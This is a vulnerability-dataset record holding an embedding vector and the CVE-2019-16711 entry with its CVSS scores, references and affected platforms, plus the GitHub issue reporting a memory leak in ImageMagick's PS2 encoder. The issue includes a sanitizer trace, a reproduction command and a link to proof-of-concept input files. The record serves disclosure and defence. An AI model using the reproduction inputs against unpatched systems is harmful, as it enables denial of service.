-0.022606804966926575, -0.011265874840319157, 0.0025481441989541054, -0.008518832735717297, -0.0024318078067153692, 0.0034976000897586346, 0.002347369911149144, 0.0026213235687464476, 0.005801812745630741, 0.020475219935178757, 0.007940903306007385, -0.012556834146380424, -0.0021878762636333704, 0.0028033338021486998, -0.030397595837712288, -0.005677970591932535, 0.006368483882397413, -0.015821760520339012, 0.0016118232160806656, 0.014996147714555264, 0.019514506682753563, 0.007111536338925362, -0.0041468325071036816, -0.006743763107806444, 0.023612553253769875, -0.008683955296874046, -0.01366765983402729, 0.015243832021951675, 0.01477097999304533, 0.0032292755786329508, 0.02410792000591755, 0.019574550911784172, -0.007130300160497427, 0.010785517282783985, 0.014553318731486797, 0.02364257536828518, -0.008969167247414589, 0.017698155716061592, 0.010605383664369583, 0.016467241570353508, 0.005561634432524443, -0.016572318971157074, 0.033534929156303406, -0.01460585743188858, 0.013314898125827312, 0.013877816498279572, -0.0013425605138763785, 0.0062934281304478645, 0.005617926362901926, -0.007805802393704653, 0.03054770827293396, 0.006616168189793825, -0.024663332849740982, 0.004600920248776674, 0.00488988496363163, 0.005921902135014534, 0.01928933896124363, -0.0034169149585068226, 0.0023548754397779703, 0.027815677225589752, -0.006619920954108238, 0.0017478617373853922, 0.005745520815253258, 0.009539591148495674, 0.003985462710261345, -0.011956388130784035, 0.00820359867066145, 0.0021878762636333704, -0.009472041390836239, 0.0005080339033156633, -0.012534317560493946, -0.006008216179907322, 0.016497263684868813, -0.029692072421312332, -0.004968693479895592, -0.00357453222386539, -0.002495605032891035, 0.01667739637196064, 0.001300341566093266, -0.0095470966771245, -0.020415175706148148, -0.018718915060162544, 0.002840861678123474, 0.011130774393677711, 0.03716762736439705, 0.027845699340105057, -0.010230104438960552, 0.004540875554084778, -0.02391277626156807, -0.004432044457644224, 0.0040567656978964806, -0.004852356854826212, -0.0033812634646892548, 0.014042939059436321, 0.015341403894126415, -0.024948546662926674, -0.0021522247698158026, 0.03161349892616272, 0.007558118551969528, 0.014478262513875961, 0.01343498658388853, 0.009929881431162357, -0.02197633683681488, 0.008931639604270458, -0.018929071724414825, 0.005246399901807308, 0.020670365542173386, 0.008068498224020004, 0.0022028875537216663, -0.027905743569135666, 0.016377173364162445, 0.019064171239733696, -0.011723714880645275, 0.006349720060825348, -0.0035332515835762024, 0.008045980706810951, -0.03287443891167641, 0.010087498463690281, -0.005681723356246948, 0.006938908249139786, -0.007798296865075827, 0.013637637719511986, 0.0009578995523042977, 0.00927689578384161, 0.016031917184591293, 0.011213335208594799, -0.006537359673529863, -0.02732030861079693, 0.024543244391679764, -0.005497836973518133, -0.004161843564361334, 0.003236781107261777, 0.029391849413514137, 0.0027920755092054605, 0.010665427893400192, -0.011828793212771416, 0.014748463407158852, 0.00001653572871873621, 0.019049160182476044, 0.01642220839858055, -0.011933871544897556, -0.008578876964747906, -0.018043411895632744, -0.01801338978111744, -0.010785517282783985, 0.00362519477494061, -0.005587903782725334, 0.006946413777768612, -0.00439076405018568, -0.0016033793799579144, 0.018403680995106697, -0.016377173364162445, -0.010913112200796604, 0.0164071973413229, -0.005535364616662264, 0.01789330132305622, -0.01936439424753189, -0.003157972590997815, -0.0017065810970962048, -0.0021841234993189573, -0.008428765460848808, -0.0028277270030230284, 0.0016015029978007078, -0.02197633683681488, 0.015446482226252556, -0.001263751881197095, 0.014740957878530025, -0.009126784279942513, 0.005854351911693811, 0.0049199070781469345, -0.0024393133353441954, 0.015926839783787727, 0.005910643842071295, 0.009734736755490303, 0.0064172702841460705, 0.011911354027688503, 0.011836298741400242, -0.004510852973908186, -0.03311461582779884, 0.004822334740310907, 0.0022591794840991497, 0.012744473293423653, -0.007993442006409168, -0.01175373699516058, -0.008984178304672241, -0.0030453887302428484, -0.012466766871511936, 0.016587330028414726, -0.012031443417072296, -0.0028033338021486998, -0.006297180894762278, -0.0031636017374694347, 0.0022873252164572477, -0.004334472119808197, 0.022291570901870728, -0.012429239228367805, -0.0014138635015115142, -0.00714906444773078, -0.007640679832547903, -0.01787829026579857, -0.0036270711570978165, -0.012399217113852501, -0.01356258150190115, 0.0026288290973752737, -0.023762663826346397, -0.019094193354249, 0.015386437997221947, 0.026359595358371735, 0.005779296159744263, 0.005036243703216314, 0.00631594518199563, -0.013367436826229095, -0.026899997144937515, -0.000653923605568707, 0.015071203000843525, -0.007381737232208252, 0.0017544291913509369, -0.015986884012818336, 0.031253233551979065, -0.0033906453754752874, 0.017367910593748093, 0.011363446712493896, 0.012947124429047108, 0.01903414912521839, -0.0009048914071172476, -0.007494321092963219, -0.0007332012755796313, 0.007291670423001051, -0.02230658195912838, -0.016061939299106598, -0.009104267694056034, 0.0008096643723547459, 0.01460585743188858, -0.003520116675645113, 0.005824329797178507, -0.005621679127216339, -0.0018473106902092695, -0.004627189598977566, 0.014553318731486797, 0.044913385063409805, -0.013089730404317379, 0.008586382493376732, -0.030307529494166374, 0.028686324134469032, 0.0014082343550398946, -0.0027301544323563576, -0.005437792278826237, -0.013202314265072346, -0.016932586207985878, -0.0008303046924993396, -0.008728988468647003, -0.011310908012092113, 0.012174049392342567, -0.009899859316647053, -0.011836298741400242, -0.016572318971157074, 0.0018698275089263916, -0.005077524576336145, 0.021315844729542732, 0.015018664300441742, -0.01669240929186344, -0.010973157361149788, -0.0013359931763261557, 0.00773825217038393, -0.01135594118386507, -0.010935628786683083, -0.010898101143538952, -0.010530327446758747, -0.0011530446354299784, 0.008458787575364113, 0.008556360378861427, 0.001082679838873446, -0.005996957886964083, -0.01855379156768322, -0.0033343536779284477, 0.007955914363265038, -0.007269153371453285, -0.009089256636798382, 0.01092061772942543, 0.005925654899328947, -0.00412056315690279, 0.003270556218922138, -0.002977838506922126, -0.012579350732266903, 0.0023961563128978014, 0.006728752050548792, -0.0015742952236905694, -0.004086787812411785, 0.009974914602935314, -0.004007979296147823, -0.009036717936396599, 0.0028014574199914932, -0.004011732060462236, 0.024753401055932045, 0.01729285530745983, -0.014650890603661537, 0.0008481304394081235, 0.025774158537387848, -0.013014674186706543, -0.0013650772161781788, -0.017698155716061592, 0.010860573500394821, 0.02070038765668869, 0.0023154711816459894, -0.02077544294297695, -0.000018016322428593412, 0.004585909191519022, 0.0056404429487884045, 0.022756917402148247, 0.025473935529589653, -0.005831835325807333, -0.00851132720708847, -0.006991446949541569, -0.011618636548519135, 0.005587903782725334, 0.004413280636072159, -0.007895869202911854, -0.014283117838203907, 0.004236899316310883, -0.01990479603409767, 0.006608662661164999, -0.025368858128786087, 0.0217661801725626, 0.0029084119014441967, 0.019544528797268867, 0.006180844735354185, -0.007347962353378534, 0.0037471605464816093, -0.027155186980962753, -0.006522348616272211, -0.02753046527504921, -0.018583813682198524, 0.004447055980563164, -0.025609036907553673, -0.003287443658336997, -0.04521360993385315, -0.010432755574584007, 0.010410238988697529, 0.013870310969650745, -0.007096525281667709, -0.01323233637958765, 0.006364731118083, 0.0167374424636364, 0.015416460111737251, 0.004979951772838831, -0.007224120199680328, -0.0022948309779167175, 0.0187639482319355, 0.005745520815253258, 0.00830117054283619, -0.007329198066145182, 0.000908175075892359, -0.006375989876687527, -0.021811213344335556, -0.02933180332183838, -0.001529261819086969, -0.011956388130784035, -0.05049753934144974, -0.008473798632621765, -0.024603288620710373, 0.00044259463902562857, -0.005430286750197411, -0.020940566435456276, 0.026344584301114082, 0.022591793909668922, 0.0075731296092271805, -0.004649706184864044, -0.004259416367858648, 0.01814849115908146, -0.0038466094993054867, -0.011333424597978592, -0.013389953412115574, 0.003364376025274396, 0.015656638890504837, 0.017427954822778702, 0.027185209095478058, -0.024333087727427483, -0.006653696298599243, 0.017803234979510307, 0.01789330132305622, 0.007002705708146095, -0.007396748289465904, 0.0010489047272130847, 0.028641290962696075, 0.013720199465751648, 0.009937386959791183, 0.0019214283674955368, 0.004345730412751436, -0.0083687212318182, 0.005310197360813618, -0.012849551625549793, 0.0071940976195037365, -0.004424538929015398, 0.016497263684868813, 0.022816961631178856, -0.001471093506552279, -0.0025556497275829315, -0.0010817416477948427, 0.004300696775317192, -0.01948448456823826, -0.007591893430799246, -0.019994864240288734, 0.007156569976359606, -0.006207114085555077, -0.008038475178182125, 0.010627900250256062, 0.024753401055932045, 0.01192636601626873, 0.00763692706823349, -0.016527285799384117, -0.006000710651278496, 0.012301644310355186, -0.0013500660425052047, 0.005779296159744263, 0.004203124437481165, -0.02337237447500229, -0.013967882841825485, -0.009201840497553349, -0.02278693951666355, -0.0006346905720420182, 0.0025669080205261707, -0.029932251200079918, -0.005407769698649645, 0.00428568571805954, -0.0054265339858829975, 0.026434650644659996, -0.004447055980563164, 0.0061658332124352455, 0.004206877201795578, 0.0038466094993054867, 0.016452230513095856, -0.00455588661134243, -0.013907838612794876, 0.006830077152699232, -0.023477451875805855, -0.03401528671383858, -0.016902564093470573, -0.004417033400386572, -0.016227062791585922, -0.006747515872120857, 0.0001019116971292533, -0.007423018105328083, -0.004972446244210005, 0.020670365542173386, -0.014508284628391266, -0.0055541289038956165, -0.00016617821529507637, 0.0065448652021586895, -0.01082304585725069, -0.013487526215612888, -0.011971399188041687, -0.006732504814863205, 0.003441308159381151, 0.021886268630623817, -0.02665981836616993, -0.008976672776043415, 0.017112720757722855, 0.005434039514511824, 0.026179460808634758, -0.024633310735225677, -0.004559639375656843, 0.01568666100502014, 0.002662604209035635, 0.007058997172862291, -0.000036032644857186824, -0.014793496578931808, 0.02584921568632126, 0.014515790157020092, 0.00318987132050097, -0.01242173369973898, 0.005854351911693811, 0.01688755303621292, 0.021991347894072533, -0.006222125142812729, 0.016497263684868813, 0.0035726558417081833, 0.0194244384765625, -0.01285705715417862, -0.020520253106951714, -0.01801338978111744, 0.010275138542056084, -0.006788796745240688, -0.003214264288544655, -0.00833869818598032, -0.0006168648251332343, 0.015086214058101177, -0.05079776048660278, -0.010995673947036266, 0.007621916010975838, -0.006777537986636162, 0.014921091496944427, 0.02097058854997158, -0.012586856260895729, -0.019604573026299477, 0.006488573271781206, -0.021195756271481514, 0.02766556479036808, 0.013517548330128193, -0.016167018562555313, -0.006871358025819063, 0.01948448456823826, -0.017262833192944527, 0.0029909734148532152, 0.009652175009250641, 0.02659977227449417, 0.015581582672894001, 0.01741294376552105, -0.005362736526876688, 0.005100041162222624, 0.000012438445082807448, 0.003891642903909087, 0.002398032695055008, 0.0058956327848136425, 0.005629184655845165, -0.01285705715417862, -0.012098994106054306, -0.009089256636798382, 0.011678681708872318, -0.01192636601626873, 0.002437436953186989, -0.003077287459746003, 0.008931639604270458, 0.005509095266461372, 0.03470579907298088, -0.030922986567020416, 0.019604573026299477, 0.03356495127081871, -0.022756917402148247, -0.0006618982879444957, 0.012534317560493946, 0.021691124886274338, -0.01038021594285965, 0.023537496104836464, 0.01849374733865261, -0.005959429778158665, 0.003992968238890171, 0.035876668989658356, -0.0021672360599040985, -0.011145785450935364, 0.014906080439686775, 0.005464061629027128, -0.004364494234323502, -0.023297319188714027, 0.03362499549984932, -0.010627900250256062, -0.0017347270622849464, 0.02880641259253025, 0.003959192894399166, -0.01748799905180931, -0.0011211459059268236, 0.005501589737832546, -0.018914060667157173, 0.008098520338535309, 0.00554287014529109, 0.002461829921230674, -0.014470756985247135, 0.00827865395694971, -0.002015247941017151, -0.002216022228822112, 0.00664619030430913, 0.0033399828244000673, 0.007993442006409168, -0.0164071973413229, -0.015716683119535446, -0.023627564311027527, -0.0016399690648540854, 0.01613699644804001, 0.0010901853675022721, -0.009036717936396599, -0.012864562682807446, -0.0017563055735081434, -0.008924134075641632, -0.014087972231209278, 0.00581307103857398, 0.014275612309575081, 0.004792312625795603, -0.003353117499500513, 0.007715735584497452, 0.014193050563335419, -0.021390901878476143, -0.011843804270029068, -0.027890732511878014, 0.007730746641755104, -0.003096051514148712, -0.028100889176130295, 0.018343636766076088, 0.000358625955414027, 0.0261344276368618, -0.0011098874965682626, -0.0010995673947036266, -0.0015968120424076915, 0.015446482226252556, -0.008391237817704678, -0.0034957234747707844, -0.014485768042504787, -0.004799818154424429, 0.004732267931103706, 0.007708230055868626, 0.0016193287447094917, 0.012609372846782207, 0.005392758641391993, 0.02170613594353199, 0.02118074521422386, 0.00028755751554854214, -0.0019054790027439594, 0.022336604073643684, -0.009877342730760574, 0.011160796508193016, -0.0001627772580832243, -0.01888403855264187, -0.0018754566553980112, 0.018313612788915634, 0.009899859316647053, -0.0102150933817029, -0.00554287014529109, 0.00967469159513712, 0.0013434987049549818, -0.0012018309207633138, 0.00016688185860402882, 0.0009916747221723199, -0.011941377073526382, 0.005839340854436159, 0.017367910593748093, -0.008158564567565918, -0.005178849678486586, 0.004987457301467657, 0.0009851072682067752, -0.012909596785902977, 0.0023736394941806793, 0.00708526698872447, 0.01048529427498579, -0.021541012451052666, 0.0021559777669608593, 0.004792312625795603, -0.008218609727919102, 0.01001244317740202, -0.007595646195113659, 0.018403680995106697, 0.005531611852347851, 0.0066987294703722, -0.01296213548630476, 0.0011324043152853847, 0.0050850301049649715, -0.005017479881644249, 0.01855379156768322, -0.01108574029058218, -0.0003837227413896471, -0.00824112631380558, -0.0055503761395812035, -0.0002873229677788913, 0.007745757699012756, 0.007239131256937981, 0.005253905430436134, -0.0007097463239915669, 0.0005216377903707325, 0.005677970591932535, -0.018373658880591393, 0.02451322227716446, -0.008361215703189373, -0.021390901878476143, -0.005546622909605503, 0.023222262039780617, -0.013119752518832684, 0.005437792278826237, 0.01423057820647955, -0.015491515398025513, -0.00582808256149292, -0.001500177662819624, 0.0032030059956014156, -0.0067587741650640965, -0.010365204885601997, 0.015026169829070568, -0.000175794746610336, -0.0009682197123765945, 0.00693140272051096, 0.0031992532312870026, 0.017788223922252655, 0.00021719270444009453, 0.0007843330386094749, -0.013247347436845303, -0.0015273854369297624, 0.008143553510308266, 0.010004937648773193, 0.0022723141591995955, -0.0077907913364470005, -0.009299412369728088, -0.008698966354131699, 0.020415175706148148, -0.014485768042504787, -0.015198797918856144, -0.0050437492318451405, -0.012008926831185818, -0.0187639482319355, 0.0015414583031088114, 0.002274190541356802, -0.027230242267251015, -0.008819055743515491, -0.010778011754155159, 0.018989115953445435, -0.009119278751313686, -0.0020039896480739117, 0.01588180661201477, 0.0027339071966707706, -0.0020584051962941885, -0.020415175706148148, 0.014485768042504787, -0.015176281332969666, -0.004717256408184767, -0.00450334744527936, 0.0008969167247414589, -0.0016183905536308885, -0.011993915773928165, 0.024828456342220306, -0.0021709888242185116, 0.006691223941743374, 0.0008959785336628556, -0.01252681203186512, 0.010245115496218204, 0.013810265809297562, -0.00044517466449178755, 0.008466293103992939, 0.01480850763618946, -0.02424302138388157, -0.003476959653198719, -0.014478262513875961, -0.018793970346450806, 0.002099685836583376, 0.025173712521791458, -0.013765232637524605, 0.023357363417744637, -0.002005866030231118, 0.00345819559879601, -0.016197040677070618, 0.022591793909668922, -0.006323450710624456, 0.01493610255420208, -0.018733926117420197, 0.005670465063303709, 0.0036270711570978165, -0.005118804983794689, -0.01862884871661663, -0.030232474207878113, 0.02311718463897705, 0.015821760520339012, 0.002739536575973034, -0.005167591385543346, 0.008931639604270458, 0.03635702654719353, -0.00950956903398037, -0.005843093618750572, 0.016842519864439964, 0.016362162306904793, -0.004781053867191076, -0.0009128660894930363, 0.017578067258000374, -0.007798296865075827, 0.013262358494102955, 0.019109204411506653, -0.004766042809933424, 0.034675776958465576, 0.008864088915288448, 0.005396511405706406, -0.01600189507007599, 0.020535264164209366, 0.012954629957675934, -0.01760808937251568, 0.004559639375656843, -0.0012693811440840364, 0.015446482226252556, 0.0024730884470045567, 0.009532085619866848, 0.005467814393341541, 0.011873826384544373, 0.046924881637096405, 0.0058581046760082245, 0.0019495742162689567, -0.04359240457415581, 0.004803570918738842, 0.005726756993681192, -0.026809928938746452, 0.022006358951330185, -0.0012046454939991236, 0.02404787577688694, -0.012279127724468708, -0.01004997082054615, -0.00934444647282362, -0.0005108484765514731, 0.004323213826864958, 0.0014579588314518332, 0.007040233351290226, -0.0031298266258090734, -0.00800845306366682, -0.008271148428320885, -0.009502063505351543, -0.015566571615636349, -0.02424302138388157, 0.004330719355493784, -0.0008143553859554231, -0.009051728993654251, -0.009569613263010979, -0.004927412606775761, 0.0007228811155073345, -0.001286268699914217, -0.004139326978474855, 0.012812023982405663, -0.0017534910002723336, -0.012917102314531803, 0.00003081392060266808, 0.004946176894009113, -0.0013707064790651202, -0.001746923546306789, -0.01225661113858223, -0.00880404468625784, -0.023432418704032898, -0.006000710651278496, -0.010627900250256062, 0.015536549501121044, -0.0024543243926018476, -0.013592604547739029, 0.005501589737832546, -0.00786584708839655, 0.013389953412115574, 0.014763474464416504, 0.00873649399727583, -0.004807323683053255, 0.0009166188538074493, 0.023882754147052765, -0.01269193459302187, 0.002576290164142847, 0.0042706746608018875, 0.009164311923086643, 0.004510852973908186, -0.00263821124099195, 0.014816013164818287, -0.008316181600093842, -0.013592604547739029, -0.010890595614910126, 0.00009317473450209945, -0.02472337894141674, -0.0005530673661269248, 0.0029890970326960087, -0.007224120199680328, 0.03758794069290161, -0.005205119494348764, -0.012369194999337196, -0.0005000592209398746, 0.004604673013091087, 0.008563865907490253, -0.0050812773406505585, 0.011033201590180397, -0.009164311923086643, 0.007396748289465904, 0.010657922364771366, 0.008023464120924473, -0.0335049070417881, 0.006064508110284805, -0.004589661955833435, -0.003388768993318081, -0.011716209352016449, -0.010995673947036266, -0.012414228171110153, -0.002371763112023473, 0.019544528797268867, -0.010732978582382202, 0.003989215474575758, -0.013367436826229095, 0.0027620531618595123, -0.0018951587844640017, -0.0007590017048642039, -0.027485432103276253, -0.0068000550381839275, 0.006357225589454174, 0.005565387196838856, 0.004244405310600996, -0.0036796103231608868, 0.025744136422872543, -0.0058956327848136425, -0.00036495880340225995, 0.003309960477054119, -0.007569376844912767, 0.01754804514348507, 0.0274704210460186, 0.009051728993654251, -0.01588180661201477, 0.0022329099010676146, -0.004717256408184767, 0.001972090918570757, 0.0020621579606086016, -0.003869126085191965, -0.00807600375264883, -0.02022003009915352, -0.0011183313326910138, -0.00043110171100124717, 0.009974914602935314, -0.004387011285871267, 0.007460545748472214, 0.005696734879165888, 0.01162614207714796, 0.019004127010703087, -0.0014448240399360657, -0.0006525163189508021, 0.009757253341376781, 0.0008561051217839122, -0.013112246990203857, 0.004983704537153244, 0.014268106780946255, 0.012812023982405663, 0.05413023754954338, -0.0024036618415266275, 0.005966935772448778, 0.0013313021045178175, -0.019199272617697716, 0.007396748289465904, -0.008436270989477634, 0.012196565978229046, -0.004642200656235218, -0.010838056914508343, -0.016106972470879555, 0.0009822926949709654, -0.00030514871468767524, 0.00030397597583942115, -0.0060720136389136314, -0.000337751058395952, 0.0022441681940108538, 0.0006299995584413409, -0.015911828726530075, -0.01292460784316063, 0.007066503167152405, -0.00833869818598032, -0.005576645489782095, -0.012271622195839882, 0.008233620785176754, 0.02049023099243641, -0.0031879949383437634, -0.019589561969041824, 0.002825850620865822, -0.0038128343876451254, 0.018058424815535545, -0.001245926134288311, 0.013555075973272324, -0.016722431406378746, 0.022051392123103142, 0.007062749937176704, 0.023792685940861702, 0.014958620071411133, -0.008826561272144318, -0.0029328051023185253, 0.004480830859392881, 0.0088790999725461, -0.03257421404123306, 0.0063309562392532825, -0.010500305332243443, 0.0015236325562000275, -0.034135375171899796, 0.03254419192671776, 0.01655730791389942, 0.01275948528200388, -0.015221314504742622, 0.013037191703915596, 0.027305297553539276, 0.00725038954988122, 0.01655730791389942, -0.008961661718785763, 0.01335993129760027, -0.0024787175934761763, 0.0016718677943572402, -0.015926839783787727, -0.006529854144901037, 0.003940429072827101, -0.012932113371789455, -0.008533843792974949, -0.008023464120924473, 0.002767682308331132, 0.005888126790523529, 0.012594361789524555, 0.027620531618595123, 0.01988978497684002, -0.012864562682807446, 0.006214619614183903, -0.01963459514081478, -0.0032424102537333965, 0.011581108905375004, -0.038278453052043915, -0.002957198303192854, 0.002771435072645545, 0.002576290164142847, -0.000013823752851749305, 0.004465819802135229, -0.008323687128722668, 0.010297655127942562, -0.009502063505351543, 0.0003468985087238252, -0.017848268151283264, 0.0012703193351626396, -0.0021353373304009438, -0.004495841916650534, -0.022546760737895966, 0.013780243694782257, 0.019409427419304848, 0.0014926721341907978, -0.0035445098765194416, -0.00844377651810646, 0.010672933422029018, 0.005955677013844252, 0.01393786072731018, 0.01400541141629219, -0.0002272783312946558, 0.01747298799455166, 0.003737778402864933, -0.004225641023367643, 0.004796065390110016, 0.01363013219088316, -0.015581582672894001, -0.008991683833301067, -0.012669418007135391, -0.02571411430835724, -0.004754784516990185, 0.013187303207814693, 0.0039254180155694485, -0.01111576333642006, 0.0029403106309473515, -0.002080921782180667, 0.006319697946310043, 0.0012815776281058788, -0.02365758642554283, -0.0014870428713038564, 0.0137352105230093, -0.017833257094025612, 0.016962610185146332, -0.025759147480130196, -0.016932586207985878, -0.0025744137819856405, -0.0062408894300460815, 0.0037152618169784546, 0.012114005163311958, 0.0018172883428633213, 0.000333294621668756, -0.00009651706204749644, -0.006158327683806419, 0.00477354833856225, 0.007167828269302845, 0.021270811557769775, -0.005614173132926226, 0.005103793926537037, 0.01550652738660574, -0.004315708298236132, 0.0025124927051365376, 0.011393469758331776, 0.000274422753136605, -0.01547650434076786, -0.004732267931103706, -0.036477115005254745, -0.0018266703700646758, 0.006038238760083914, -0.005614173132926226, 0.002398032695055008, -0.00851132720708847, 0.023747652769088745, 0.007963419891893864, -0.0075393542647361755, -0.012872068211436272, -0.0017225304618477821, 0.015011158771812916, 0.008248631842434406, 0.016467241570353508, 0.02170613594353199, 0.013907838612794876, 0.019094193354249, 0.013239841908216476, -0.0012065218761563301, -0.0014176162658259273, 0.005779296159744263, -0.02828102372586727, 0.010372710414230824, 0.006000710651278496, 0.01727784425020218, 0.0038334745913743973, -0.024077897891402245, 0.00017837478662841022, 0.01245926134288311, -0.004128068685531616, 0.009059234522283077, 0.011100752279162407, 0.012969641014933586, 0.01702265441417694, 0.009396985173225403, 0.020730409771203995, -0.017172764986753464, 0.02739536389708519, -0.014193050563335419, 0.013337414711713791, -0.0004888008697889745, -0.001889529637992382, 0.009389479644596577, -0.009472041390836239, 0.021601056680083275, 0.021150723099708557, 0.019214283674955368, -0.011243358254432678, -0.0009757252992130816, -0.001725345035083592, -0.01071796752512455, -0.0012196566676720977, -0.008091014809906483, -0.0037903175689280033, 0.01835864782333374, -0.00219538202509284, 0.027290286496281624, -0.0007097463239915669, 0.008398743346333504, 0.010853067971765995 ]
2,276
CVE-2019-16711
2019-09-23T12:15:10.643000
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1542" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-40:*:*:*:*:*:*:*", "matchCriteriaId": "2EA99C30-C4DA-4E3A-85F6-72F0B879EEBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1542
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description ``` ==85960==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f1f0 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4153a9 in AcquireImageInfo MagickCore/image.c:349 #4 0x418321 in CloneImageInfo MagickCore/image.c:944 #5 0x64faad in Huffman2DEncodeImage coders/ps2.c:207 #6 0x652046 in WritePS2Image coders/ps2.c:766 #7 0x809316 in WriteImage MagickCore/constitute.c:1159 #8 0x80a03b in WriteImages MagickCore/constitute.c:1376 #9 0xb1573d in CompositeImageCommand MagickWand/composite.c:1676 #10 0xc9d45d in MagickCommandGenesis MagickWand/mogrify.c:184 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ffff31f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 13024 byte(s) leaked in 1 allocation(s). ``` ### Steps to Reproduce /usr/local/bin/magick composite Memory-Leak-input1 Memory-Leak-input2 output.ps2 ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: '7.0.8-40' - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-42-generic #45~16.04.1-Ubuntu SMP Mon Nov 19 13:02:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ' ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared' <!-- Thanks for reporting the issue to ImageMagick! --> testcase: [ https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip](https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip) credit: ADlab of venustech
memory leak in Huffman2DEncodeImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1542/comments
2
2019-04-11T02:03:07
2019-10-29T09:33:03Z
https://github.com/ImageMagick/ImageMagick/issues/1542
431,795,900
1,542
true
